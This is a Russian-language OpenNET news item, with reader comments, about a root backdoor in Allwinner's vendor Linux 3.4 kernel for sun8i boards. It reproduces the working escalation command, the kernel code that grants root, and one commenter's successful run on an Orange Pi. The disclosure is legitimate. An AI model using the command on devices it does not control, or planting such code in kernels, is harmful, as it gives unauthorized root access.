The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Бэкдор в отладочном коде модифицированного ядра Linux для систем Allwinner

10.05.2016 11:48

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".


   $ id
   uid=1000(user) gid=1000(user) 

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 

   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:


        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10.

  1. Главная ссылка к новости (http://www.theregister.co.uk/2...)
  2. OpenNews: Определён универсальный пароль для входа на межсетевые экраны Juniper ScreenOS
  3. OpenNews: Концепция stateless-ноутбука, защищённого от аппаратных бэкдоров
  4. OpenNews: Взлом инфраструктуры Linux Mint привёл к распространению ISO-образов с бэкдором
  5. OpenNews: В socat выявлен потенциальный бэкдор, позволяющий воссоздать ключи шифрования
  6. OpenNews: В межсетевых экранах FortiGate выявлен бэкдор
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/44395-backdoor
Ключевые слова: backdoor, allwinner
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (42) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 13:04, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +25 +/
    отладочный режим для АНБ ФСБ КГБ
     
     
  • 2.2, Аноним (-), 13:11, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    короче для всех кроме нас)
     
     
  • 3.17, Аноним (-), 15:26, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А вы, надо полагать, ЦРУ?
     
     
  • 4.21, Аноним (-), 16:17, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +12 +/
    Нет, ми моссад.
     
     
  • 5.46, Fantomas (??), 04:46, 11/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Московский сад что ли?
     
     
  • 6.47, t28 (?), 09:22, 11/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Да.
     
  • 3.41, Аноним (-), 23:23, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    >  короче для всех кроме нас)

    А у тебя что, echo не работает?

     
  • 2.19, Аноним (-), 15:51, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ru.wikipedia.org
    Совет по национальной безопасности (United States National Security Council) — совещательный и координирующий орган при Президенте США.
    Национальный совет по контрразведке (National Counterintelligence Board).
    Министерство национальной безопасности США.
    Центральное разведывательное управление.
    Агентство национальной безопасности (США).
    Федеральное бюро расследований.
    Разведывательное управление министерства обороны США.
    Секретная служба США.
    Национальное управление военно-космической разведки США.
    Бюро разведки и исследований государственного департамента.
    и другие (всего 16).
    Так же к спецслужбам относятся и другие службы
    Агентство по перспективным оборонным научно-исследовательским разработкам США.
     
  • 2.26, Аноним (-), 17:45, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?
     
     
  • 3.34, Eklykti (?), 19:37, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.
     
     
  • 4.35, Crazy Alex (ok), 20:20, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.
     
     
  • 5.36, РОСКОМУЗОР (?), 21:10, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если ты хочешь безопасность, какой к лешему андроид?
     
     
  • 6.37, God (?), 21:38, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Если ты хочешь, то какая к лешему безопасность?
     
  • 6.38, Crazy Alex (ok), 21:48, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.
     
  • 2.39, vitalif (ok), 21:49, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Не, на андроиде маст хэв!
     

  • 1.6, Аноним (-), 13:42, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    Это не баг, это фича!
     
  • 1.8, бедный буратино (ok), 14:01, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    пойду свой armbian проверю
     
     
  • 2.42, Аноним (-), 23:25, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > пойду свой armbian проверю

    Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.

     

  • 1.11, Аноним as anon (?), 14:35, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.
     
     
  • 2.14, p5n (ok), 14:51, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно не с ангстрём линуксом.

    А вообще было бы здорово, если бы все производители BSP для мобильных чипов так делали. А то зарутовать телефон - целая проблема.

     
     
  • 3.27, Аноним (-), 17:47, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно
    > не с ангстрём линуксом.
    > А вообще было бы здорово, если бы все производители BSP для мобильных
    > чипов так делали. А то зарутовать телефон - целая проблема.

    Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться в шелл при первм юзе, а потом отключать дырку.

     
  • 3.43, Аноним (-), 23:26, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > Например cubieboard идёт с прошитым андроидом.

    У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.

     

  • 1.13, Аноним (-), 14:48, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Может стоит написать в новости кто же этот герой, добавивший бэкдор?
     
     
  • 2.15, p5n (ok), 14:52, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Может стоит написать в новости кто же этот герой, добавивший бэкдор?

    Врядли компания Allwinner это расскажет. Речь о их форке ядра.

     

  • 1.23, Аноним (-), 16:54, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
    -bash: /proc/sunxi_debug/sunxi_debug: No such file or directory
    $ uname -a
    Linux evo 3.4.79-sunxi #2 SMP PREEMPT Sun Jul 13 20:36:39 EEST 2014 armv7l GNU/Linux
     
     
  • 2.24, Аноним (-), 16:56, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    а, там только для арм8. посыпаю голову пеплом :}
     
     
  • 3.28, anonymous (??), 18:25, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    sun8i - это armv7

    orangepi@OrangePI:~$ uname -a
    Linux OrangePI 3.4.39 #2 SMP PREEMPT Mon Oct 12 12:03:03 CEST 2015 armv7l GNU/Linux
    orangepi@OrangePI:~$ id
    uid=1000(orangepi) gid=1000(orangepi) groups=1000(orangepi),27(sudo)
    orangepi@OrangePI:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
    orangepi@OrangePI:~$ id
    uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(orangepi)

     

  • 1.25, Аноним (-), 17:06, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    тот самый случай, когда proc не в прок
     
     
  • 2.44, Аноним (-), 23:28, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > тот самый случай, когда proc не в прок

    Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?

     
     
  • 3.54, Аноним (-), 23:38, 11/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    >> тот самый случай, когда proc не в прок
    > Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено
    > в системе?

    Ныхрены это смотреть на _отлаженной_ системе?

     

  • 1.29, anonimus (?), 18:27, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Строка 'cred->euid = 0;' написана 2 раза

    Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.

     
     
  • 2.30, тоже Аноним (ok), 18:35, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками.
    Но пока, насколько мне известно, ему это не грозит.
     
     
  • 3.32, anonimus (?), 18:44, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитной работы не гробили систему. Очень печально, когда подобная гадость портит тебе жизнь. Учитывая, что столько косяков в 10 строчках и учитывая, что код работает в режиме ядра, очень стремно становится от мысли, что же там творится в более сложном коде.
     
  • 2.31, anonimus (?), 18:38, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать  strncmp(..., 12)
     
     
  • 3.33, Аноним (-), 19:25, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +3 +/
    А смысл? Вернет значение больше нуля да и ладно
     
  • 3.51, alex (??), 17:37, 11/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    count - это типа сначала длину строки в буфере проверить?
    дак сравнение точно также пройдётся по нему
    проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.
     

  • 1.40, chinarulezzz (ok), 22:27, 10/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > предлагаемое компанией Allwinner

    к перцам нужно внимательней относиться)

     
     
  • 2.45, Аноним (-), 23:57, 10/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    >> предлагаемое компанией Allwinner
    > к перцам нужно внимательней относиться)

    У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.

     

  • 1.48, IZh. (?), 11:56, 11/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > cred->uid = 0;
    > ...

    А RCU для кого писано?
    Вот тут точно статические анализаторы могли бы warning выдавать.

     
  • 1.52, Аноним (-), 17:50, 11/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?
     
  • 1.53, Аноним (-), 17:53, 11/05/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    такая спокойная беседа о бэкдоре
     
     
  • 2.55, Аноним (-), 23:39, 11/05/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > такая спокойная беседа о бэкдоре

    Так они повсюду. Чтобы не понтоваться - надо выкинуть девайся и к староверам, в тайгу. А так, мыши, конечно, плакали, кололись - но фуле делать, социальность обезьяньего стада не истребить ничем! :)

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Inferno Solutions
    Ideco
    A-Real
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру